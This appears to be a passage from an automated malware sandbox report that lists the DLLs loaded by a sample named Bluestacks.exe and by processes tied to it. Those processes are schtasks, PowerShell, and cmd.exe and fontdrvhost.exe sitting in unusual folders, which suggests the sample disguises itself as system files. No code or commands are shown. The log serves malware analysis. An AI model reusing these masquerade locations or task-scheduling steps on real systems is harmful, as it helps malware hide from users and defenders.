Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\ShellComponents\cmd.exe	Section loaded: mscoree.dll
Source: C:\Windows\ShellComponents\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\ShellComponents\cmd.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\ShellComponents\cmd.exe	Section loaded: version.dll
Source: C:\Windows\ShellComponents\cmd.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\ShellComponents\cmd.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\ShellComponents\cmd.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\ShellComponents\cmd.exe	Section loaded: uxtheme.dll
Source: C:\Windows\ShellComponents\cmd.exe	Section loaded: windows.storage.dll
Source: C:\Windows\ShellComponents\cmd.exe	Section loaded: wldp.dll
Source: C:\Windows\ShellComponents\cmd.exe	Section loaded: profapi.dll
Source: C:\Windows\ShellComponents\cmd.exe	Section loaded: cryptsp.dll
Source: C:\Windows\ShellComponents\cmd.exe	Section loaded: rsaenh.dll
Source: C:\Windows\ShellComponents\cmd.exe	Section loaded: cryptbase.dll
Source: C:\Windows\ShellComponents\cmd.exe	Section loaded: sspicli.dll
Source: C:\Windows\ShellComponents\cmd.exe	Section loaded: mscoree.dll
Source: C:\Windows\ShellComponents\cmd.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\ShellComponents\cmd.exe	Section loaded: version.dll
Source: C:\Windows\ShellComponents\cmd.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\ShellComponents\cmd.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\ShellComponents\cmd.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\ShellComponents\cmd.exe	Section loaded: uxtheme.dll
Source: C:\Windows\ShellComponents\cmd.exe	Section loaded: windows.storage.dll
Source: C:\Windows\ShellComponents\cmd.exe	Section loaded: wldp.dll
Source: C:\Windows\ShellComponents\cmd.exe	Section loaded: profapi.dll
Source: C:\Windows\ShellComponents\cmd.exe	Section loaded: cryptsp.dll
Source: C:\Windows\ShellComponents\cmd.exe	Section loaded: rsaenh.dll
Source: C:\Windows\ShellComponents\cmd.exe	Section loaded: cryptbase.dll
Source: C:\Windows\ShellComponents\cmd.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
